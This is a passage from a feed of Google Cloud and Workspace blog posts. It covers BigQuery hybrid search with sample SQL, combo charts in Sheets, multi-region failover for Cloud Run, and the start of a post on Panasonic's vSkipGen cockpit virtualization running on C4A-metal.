    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT base.trial_id, base.study_title, distance\r\nFROM\r\n  AI.SEARCH(\r\n    TABLE mydataset.clinical_trials,\r\n    \&amp;#x27;study_title\&amp;#x27;,\r\n    &amp;quot;What treatments are available for advanced tumors?&amp;quot;\r\n  );&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fdc88c3f730&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Unifying Keyword and Vector with Hybrid Search (Public Preview)&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Semantic (vector) search is incredibly powerful; for example, the query above will successfully return conceptually related terms like "chemotherapy." However, semantic search isn't always enough. What if a researcher is searching for a specific, highly technical immunotherapy drug designation like "MK3475"? Because this alphanumeric string lacks broad semantic meaning, pure vector search might struggle to rank it correctly.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By merging lexical search with existing semantic capabilities, BigQuery's &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/search_functions#hybrid-search"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;hybrid search&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; allows for data retrieval based on both keyword similarity and underlying meaning. This approach unites the conceptual depth of semantic vector search with the pinpoint accuracy of lexical matching, utilizing algorithms such as Reciprocal Rank Fusion and BM25. The result is a significant boost in search precision and a reduction in LLM hallucination costs through the reranking of results based on keyword frequency and semantic relevance. Users can implement this via the AI.SEARCH and VECTOR_SEARCH functions by employing the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;hybrid mode&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;lexical_search_columns&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; parameters. Furthermore, performance can be optimized by extending vector indexes to include keyword data, which accelerates the lexical search process.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can now perform hybrid searches effortlessly using the AI.SEARCH() function by simply setting the mode to HYBRID:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT base.trial_id, base.study_title, distance\r\nFROM\r\n  AI.SEARCH(\r\n    TABLE mydataset.clinical_trials,\r\n    \&amp;#x27;study_title\&amp;#x27;,\r\n    &amp;quot;Cancer treated by MK-3475&amp;quot;,\r\n    mode =&amp;gt; \&amp;#x27;HYBRID\&amp;#x27;\r\n  );&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fdc88c3f550&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To speed up these hybrid queries at scale, you can easily &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/vector-index#use_vector_indexes_with_hybrid_search"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;extend your CREATE VECTOR INDEX DDL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to include the keyword columns you want to use for the lexical portion of the search, natively combining your indexes.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building an End-to-End Unstructured Data Analytics Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The search and embedding features launching today are part of a much broader vision. We are building an end-to-end unstructured data analytics platform. One common type of unstructured data is documents, and BigQuery now provides the complete toolset to manage this workflow from end to end:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/image1_bQnyG2Q.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Enable zero-ETL workflows by querying unstructured PDFs and documents directly where they live in Google Cloud Storage using Object Tables.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Process:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Utilize embedded AI capabilities like AI.PARSE_DOCUMENT (coming soon) for layout-aware chunking (perfect for RAG), AI.GENERATE for entity extraction, and AI.CLASSIFY to instantly categorize records using foundational models directly in your SQL pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ground:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Build highly accurate context using Autonomous Embeddings and Hybrid Search. Hybrid search combines the conceptual understanding of semantic vector search with the exact precision of lexical keyword matching By reranking results based on both semantic relevance and keyword frequency, you drastically increase search precision and drive down LLM hallucinations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Relate:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Uncover hidden multi-hop insights by mapping extracted entities (like Sponsors, Trials, and Drugs) into a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/graph-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Graph&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;—no specialized graph database required.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Activate:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Bring it all together with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery's Conversational Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; agents. Using functions like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-agg"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI.AGG&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, you can chat directly with your complex data, generate visualizations, and perform trend analysis at massive scale.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With unstructured data as a first-class citizen in BigQuery, you can finally bridge the gap between your raw documents and conversational AI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ready to get started?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Explore the Code:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Check out the complete end-to-end clinical trials demonstration in our &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/document-analytics-on-bigquery" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Document Analytics on BigQuery GitHub Repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Read the Docs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Dive into the official documentation for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/autonomous-embedding-generation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Autonomous Embeddings&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/search_functions#hybrid-search"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Hybrid Search&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start building your own unified data pipelines today.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/bigquery-search-innovations-unify-structured-unstructured-data" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-20T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/import-and-create-combo-charts-in-Google-Sheets.html</id>
    <title>Import and create combo charts in Google Sheets</title>
    <updated>2026-07-20T17:30:35+00:00</updated>
    <content type="html">Google Sheets now offers enhanced support for combo charts, providing a more seamless experience when creating multi-series visualizations. Users can create new “Combo” chart types, enabling complex dataset visualization with different scales and metrics without requiring manual re-plotting. These include:&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Clustered Column - Line&lt;/li&gt;&lt;li&gt;Clustered Column - Line on Secondary Axis&lt;/li&gt;&lt;li&gt;Custom Combo&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Sheets combo chart support also comes with enhanced Microsoft Excel import compatibility. Previously, importing external files that contained combo charts with a secondary axis would result in the secondary axis being dropped. This update ensures that secondary axis configurations and combo chart types are preserved during file import.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RcdUjK5Z9hkBQX7Z87mRMidxzVVT_4B8yEtSbj2qpg-mz1tIiSMR0qLMXRDLGSsyxhxxVL_TtOJ0qOCTefWK6pi7u3ZIX6aJRRdsSNlQLU-f-VWRCcXYVOEv-4Pe4ilBNRY9tTl3OdWg4DyPT3n42RoL_tzzQQDpo0Wn73kX_WoDg4rwpCE5JVXKDM/s2048/Import%20and%20create%20combo%20charts%20in%20Google%20Sheets%20-%206843.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RcdUjK5Z9hkBQX7Z87mRMidxzVVT_4B8yEtSbj2qpg-mz1tIiSMR0qLMXRDLGSsyxhxxVL_TtOJ0qOCTefWK6pi7u3ZIX6aJRRdsSNlQLU-f-VWRCcXYVOEv-4Pe4ilBNRY9tTl3OdWg4DyPT3n42RoL_tzzQQDpo0Wn73kX_WoDg4rwpCE5JVXKDM/s1600/Import%20and%20create%20combo%20charts%20in%20Google%20Sheets%20-%206843.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;User creating a combo chart in Google Sheets&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/63824" target="_blank"&gt;learn more about adding and editing a chart in Google Sheets.&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 20, 2026&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on August 4, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/63824" target="_blank"&gt;Add &amp;amp; edit a chart or graph&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/import-and-create-combo-charts-in-Google-Sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-20T17:30:35+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RcdUjK5Z9hkBQX7Z87mRMidxzVVT_4B8yEtSbj2qpg-mz1tIiSMR0qLMXRDLGSsyxhxxVL_TtOJ0qOCTefWK6pi7u3ZIX6aJRRdsSNlQLU-f-VWRCcXYVOEv-4Pe4ilBNRY9tTl3OdWg4DyPT3n42RoL_tzzQQDpo0Wn73kX_WoDg4rwpCE5JVXKDM/s72-c/Import%20and%20create%20combo%20charts%20in%20Google%20Sheets%20-%206843.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RcdUjK5Z9hkBQX7Z87mRMidxzVVT_4B8yEtSbj2qpg-mz1tIiSMR0qLMXRDLGSsyxhxxVL_TtOJ0qOCTefWK6pi7u3ZIX6aJRRdsSNlQLU-f-VWRCcXYVOEv-4Pe4ilBNRY9tTl3OdWg4DyPT3n42RoL_tzzQQDpo0Wn73kX_WoDg4rwpCE5JVXKDM/s72-c/Import%20and%20create%20combo%20charts%20in%20Google%20Sheets%20-%206843.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RcdUjK5Z9hkBQX7Z87mRMidxzVVT_4B8yEtSbj2qpg-mz1tIiSMR0qLMXRDLGSsyxhxxVL_TtOJ0qOCTefWK6pi7u3ZIX6aJRRdsSNlQLU-f-VWRCcXYVOEv-4Pe4ilBNRY9tTl3OdWg4DyPT3n42RoL_tzzQQDpo0Wn73kX_WoDg4rwpCE5JVXKDM/s72-c/Import%20and%20create%20combo%20charts%20in%20Google%20Sheets%20-%206843.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/serverless/cloud-run-multi-region-services-enhanced-for-high-availability</id>
    <title>Making highly available, multi-region Cloud Run services just got easier</title>
    <updated>2026-07-20T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application downtime for mission-critical services can directly impact your reputation and bottom line. To avoid that, you need to be able to deploy regionally resilient workloads that detect and automatically recover from failures. But setting up multi-region, highly available deployments often involves complex configurations, and responding to incidents or outages is usually a manual process. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/run/docs/multiple-regions"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Multi-region services&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; on Cloud Run&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provide a one-command approach to deploying the same service configuration across multiple regions. When deployed with a global external application load balancer, you can serve traffic from different regions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, we’ve made it easier to detect regional service disruptions and automatically fail over to a healthy region within seconds with new capabilities:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Readiness probes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; provide instance-level health checks for your Cloud Run service &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to determine exactly when your containers are ready to serve traffic. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;You can also use these probes to monitor how many healthy or unhealthy instances exist for your service in each region.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Service health &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;aggregates instance-level health checks from readiness probes to calculate the health of your service in each region. This aggregate health is exposed via serverless network endpoint groups (NEGs) in each region. When your service is connected to a global application load balancer, traffic automatically fails away from regions with unhealthy services. Service health can be used with both single and multi-region services.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s take a closer look at some scenarios where these new capabilities can come in handy.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Use cases&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To make your Cloud Run applications highly available, it is essential to minimize the downtime for each incident. In high availability scenarios, readiness probes can help you detect regional service failures and automatically fail over, minimizing service degradation or disruptions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To achieve automated failover, one key thing to consider is whether you plan to support application traffic from the public internet or from within your private network (VPC).&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Public internet applications&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: When you have a public-facing website or API, configure Cloud Run with a global external application load balancer for automatic detection and failover capabilities. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Private network applications&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: When you have private applications with internal traffic, configure Cloud Run with a cross-regional internal application load balancer for automatic detection and failover capabilities. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Design Considerations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run’s new service health excels at quickly detecting and recovering outages in active-active configurations, where two or more regions are actively configured to serve traffic. Some things to consider when designing your multi-region setup:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Single points of failure&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: As you design your application, ensure that each layer of your application, including your database layer, has regional redundancies to avoid any single points of failure. For three-tiered applications on Cloud Run, consider setting up your web tier and application tier with distinct multi-region architectures to handle public internet and private networking respectively.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data replication&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: When replicating data across regions and evaluating your recovery point objective (RPO), consider whether you require zero data loss. Cloud Run service health works best with read- and write-heavy applications that actively synchronize data across regions. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data residency&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Google Cloud offers several multi-region database configurations with managed multi-region solutions including &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/firestore/native/docs/locations#location-mr"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Firestore&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/instance-configurations#multi-region-configurations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/locations#considerations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/postgres/locations#location-mr"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. These all work great for multi-region architectures on Cloud Run that have strict data sovereignty requirements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run’s enhanced multi-region high availability services are currently available in all Cloud Run regions at no additional cost. You only pay for the standard CPU and memory required to run the readiness probes. To learn more, check out our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/run/docs/tutorials/configure-service-health"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/serverless/cloud-run-multi-region-services-enhanced-for-high-availability" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-20T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/partners/panasonic-automotive-vskipgen-runs-on-axion-based-c4a-metal</id>
    <title>Accelerating automotive innovation with C4A-metal and Panasonic Automotive vSkipGen</title>
    <updated>2026-07-20T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As the automotive landscape accelerates toward software-defined vehicles, Cockpit Domain Controllers (CDCs) are becoming the core of next-generation in-cabin experiences. The ability to rapidly develop, test, and validate CDC software in a flexible, hardware-independent environment is critical for innovation and time-to-market. However, physical hardware constraints and the requirement for high-performance graphics present significant challenges for global development teams. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Panasonic Automotive’s vSkipGen™ addresses these challenges as a next-generation CDC virtualization platform, now validated on Google Cloud’s C4A-metal, our Axion bare-metal offering. By integrating Panasonic Automotive’s advanced Unified HMI™ remote GPU offload technology with support for Android Automotive OS (&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AAOS) and Android SDV&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, vSkipGen delivers a robust, cloud-native solution for cockpit software development and validation — empowering teams to innovate without hardware limitations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we provide workload-optimized infrastructure to help ensure the right resources for every task.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Similar to the entire &lt;/span&gt;&lt;a href="https://cloud.google.com/products/axion?e=48754805&amp;amp;hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Axion virtual machine family&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, C4A-metal instances are built on Google Cloud’s custom Arm-based Axion architecture. C4A-metal offers 96 vCPUs, two DDR5 memory configurations (384GB and 768GB), and up to 100Gbps of networking bandwidth. It also provides full support for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/disks/hyperdisks"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Hyperdisk&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including Balanced, Extreme, Throughput, and ML types. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;And like the rest of the bare metal portfolio, C4A-metal is powered by &lt;/span&gt;&lt;a href="https://cloud.google.com/titanium"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Titanium&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a key component for multi-tier offloads and security that is foundational to our infrastructure. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;High performance for demanding workloads&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C4A-metal is particularly well-suited for complex tasks such as creating digital twins of vehicle cockpits where performance must accurately mirror real-world behavior. Traditionally, the transition to software-defined vehicles has relied on expensive and scarce physical prototypes; C4A-metal overcomes this by offering the high performance and hardware-level access of bare metal with the scalability of the cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Panasonic Automotive leverages C4A-metal to bypass traditional hardware bottlenecks, enabling their teams to execute complex virtualization tasks and accelerate the development of next-generation cockpit software.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Google Cloud’s Axion Bare Metal has been a game-changer for our vSkipGen™ platform. By providing scalable, high-performance Arm-based infrastructure, C4A-metal allows our teams to develop and test production-intent software in the cloud with behavior that closely matches target automotive hardware. This cloud-to-car bit parity reduces dependence on costly physical prototypes, improves validation efficiency, increases test coverage and accelerates time-to-market for next-generation cockpit platforms.”&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; - &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Andrew Poliak, CTO, Panasonic Automotive Systems America.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By leveraging vSkipGen and Unified HMI on C4A-metal, automotive manufacturers can now build, test, and validate full AAOS stacks in a hardware-independent, cloud-native environment, moving from physical dependency to scalable digital twins.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_rib6Qrb.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Unified HMI solution overview&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How vSkipGen works: Virtualizing the cockpit with Cuttlefish&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Panasonic Automotive’s vSkipGen acts as a digital twin for physical CDC hardware. To provide a hardware-agnostic environment for Android virtual machines, vSkipGen uses components of Android Cuttlefish. At its core, vSkipGen leverages a cloud-optimized Virtual Machine Monitor (VMM) built on crosvm (the open-source, security-focused VMM originally developed for Chrome OS) which utilizes Linux KVM (Kernel-based Virtual Machine) for hardware-assisted virtualization. The VMM backend is implemented in Rust for enhanced security, scalability, and performance. By running the full stack on C4A-metal (see Figure 2), Panasonic lets developers boot a full AAOS image in the cloud, which behaves exactly like the software running in a physical vehicle.&lt;/span&gt;&lt;/p&gt;
